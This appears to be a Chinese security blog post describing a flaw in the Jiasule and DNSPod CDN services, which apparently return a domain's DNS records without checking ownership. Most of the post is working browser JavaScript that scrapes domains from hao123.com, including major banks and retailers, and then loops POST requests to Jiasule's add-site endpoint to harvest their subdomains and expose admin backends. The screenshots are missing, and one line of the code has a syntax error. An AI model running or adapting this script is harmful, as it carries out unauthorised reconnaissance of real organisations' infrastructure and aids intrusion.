一类CDN的域名遍历漏洞

这个已经测试了加速乐和dnspod。
就是加速了和dnspod在没有验证域名所有者的情况下,扫描域名得到二级目录,得到该域名的所有可用解析。
这样某些网站的后台就暴露了。
举例如下:
1、先爬http://www.hao123.com/的所有连接,找到测试的网站
代码如下

var x,s1,s2,s=[];for (var i=0;i<$("a[href*='http://']").length;i++)
{
        x=$("a[href*='http://']")[i].href.split("/")[2].split(".");
        s1=x.pop();s2=x.pop();
        s.push(s2+"."+s1+);
}

2、将得到的结果去重

Array.prototype.unique3 = function(){
        var res = [];
        var json = {};
        for(var i = 0; i < this.length; i++){
                if(!json[this[i]]){
                        res.push(this[i]);
                        json[this[i]] = 1;
                }
        }
        return res;
}
s.unique3();

得到如下算例:

['123juzi.net','hao123.com','baidu.com','163.com','21cn.com','renren.com','qq.com','weibo.com','google.com','hotmail.com','189.cn','kaixin001.com','jd.com','undefined.sd','com.cn','sohu.com','youku.com','ifeng.com','taobao.com','4399.com','xinhuanet.com','tmall.com','eastmoney.com','58.com','soufun.com','ctrip.com','meilishuo.com','12306.cn','qunar.com','jumei.com','ganji.com','7k7k.com','cctv.com','cntv.cn','vip.com','ly.com','tuniu.com','dangdang.com','liepin.com','lefeng.com','mogujie.com','nuomi.com','zhaopin.com','suning.com','yhd.com','amazon.cn','oadz.com','jiayuan.com','m18.com','yougou.com','moonbasa.com','jiukuaiyou.com','iqiyi.com','letv.com','kankan.com','17173.com','2144.cn','37.com','netease.com','huanqiu.com','china.com','chinaiiss.com','miercn.com','xinjunshi.com','hupu.com','zhibo8.cc','126.com','aliyun.com','qidian.com','qdmm.com','xxsy.net','zongheng.com','duoku.com','readnovel.com','yixun.com','zhe800.com','1ting.com','kugou.com','kuwo.cn','tianya.cn','mop.com','douban.com','zhenai.com','baihe.com','youyuan.com','6.cn','dianping.com','leho.com','anjuke.com','jia.com','bitauto.com','cheshi.com','meituan.com','lashou.com','9377.com','1377.com','ztgame.com','ecwan77.com','10086.cn','10010.com','18183.com','ptbus.com','91.com','elong.com','lecai.com','hexun.com','rong360.com','zhcw.com','ccb.com','abchina.com','boc.cn','bankcomm.com','haodai.com','51job.com','yingjiesheng.com','131cc.com','sina.com','ku6.com','56.com']

3、利用加速乐的接口去扫

i=0;
setInterval(function(){$.post("http://jiasule.baidu.com/manage/add_site/",{timestamp:new Date().getTime(),domain:s.unique3()[i],cdn_type:"ns"},function(a){document.write(a)});i++;if(i>119) alert(1)},500)

4、得到结果如下:

 

<ignore_js_op style="color: #444444;">

5.png (33.66 KB, 下载次数: 0)

下载附件  保存到相册

7 天前 上传



<ignore_js_op style="color: #444444;"> 

<ignore_js_op style="color: #444444;"> 

<ignore_js_op style="color: #444444;"> 

<ignore_js_op style="color: #444444;"> 

5、点一个进去看看
<ignore_js_op style="color: #444444;"> 
<ignore_js_op style="color: #444444;">

标签: 无
返回文章列表 文章二维码
本页链接的二维码
打赏二维码